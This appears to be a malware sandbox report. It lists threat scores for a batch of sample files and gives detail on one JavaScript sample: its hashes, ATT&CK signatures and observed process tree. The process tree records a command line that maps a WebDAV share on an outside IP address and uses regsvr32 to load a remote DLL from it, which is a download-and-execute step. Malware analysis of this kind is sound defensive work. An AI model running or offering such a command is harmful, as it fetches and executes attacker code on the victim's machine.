Overview

overview

10

Static

static

10

00195a0548...01.exe

windows7-x64

10

00195a0548...01.exe

windows10-2004-x64

10

103494894d...b8.exe

windows7-x64

8

103494894d...b8.exe

windows10-2004-x64

8

15e918d1df...c8.exe

windows7-x64

10

15e918d1df...c8.exe

windows10-2004-x64

10

1adf26633c...96.exe

windows7-x64

10

1adf26633c...96.exe

windows10-2004-x64

7

25bbed4562...a9.exe

windows7-x64

10

25bbed4562...a9.exe

windows10-2004-x64

10

29b828a2d4...7b.exe

windows7-x64

10

29b828a2d4...7b.exe

windows10-2004-x64

10

2f0d81e068...61.exe

windows7-x64

10

2f0d81e068...61.exe

windows10-2004-x64

10

317ce86a4e...85.exe

windows7-x64

10

317ce86a4e...85.exe

windows10-2004-x64

10

3c764ae83e...36.exe

windows7-x64

8

3c764ae83e...36.exe

windows10-2004-x64

8

40c918b435...1df.js

windows7-x64

3

40c918b435...1df.js

windows10-2004-x64

7

4963827ab4...5e.exe

windows7-x64

10

4963827ab4...5e.exe

windows10-2004-x64

10

50d670fcdb...0d.exe

windows7-x64

7

50d670fcdb...0d.exe

windows10-2004-x64

10

55911205ed...78.exe

windows7-x64

10

55911205ed...78.exe

windows10-2004-x64

10

5a48f7ceeb...a3.exe

windows7-x64

10

5a48f7ceeb...a3.exe

windows10-2004-x64

10

6700ee6916...ce.exe

windows7-x64

10

6700ee6916...ce.exe

windows10-2004-x64

10

725827cfa1...7b.exe

windows7-x64

10

725827cfa1...7b.exe

windows10-2004-x64

10

Resubmissions

27/07/2024, 17:08

240727-vnrrpszapr 10

24/07/2024, 13:55

240724-q8e67aygrr 10

Analysis

  • max time kernel
    12s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24/07/2024, 13:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    40c918b435649c05c1f43a6f95c9bdb613726a86dfce987ea5ccd90ec2c911df.js

  • Size

    5KB

  • MD5

    d2f7824a9ca7ba8e47764dee6c61ac6b

  • SHA1

    b11912837f3fccb36a4cfd10c3b95175515c7a1b

  • SHA256

    40c918b435649c05c1f43a6f95c9bdb613726a86dfce987ea5ccd90ec2c911df

  • SHA512

    f1e608ff3255dc5865c69d4fd153968f054c0a408043977e01b536e46d0f1b59fc53b54ee6a55e495c3469549b22b3ff4c35c3bd452a4199db622b0d4046911f

  • SSDEEP

    96:kTdLPdO337lh7z3T4d4hut69UXG2siCCehAkx3nCwG2siCCehCGu5:kTBdc5YqnuGXiCCcAkxGXiCCcCG4

Score
3/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Runs net.exe
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\40c918b435649c05c1f43a6f95c9bdb613726a86dfce987ea5ccd90ec2c911df.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\22997363323494.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\system32\net.exe
        net use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads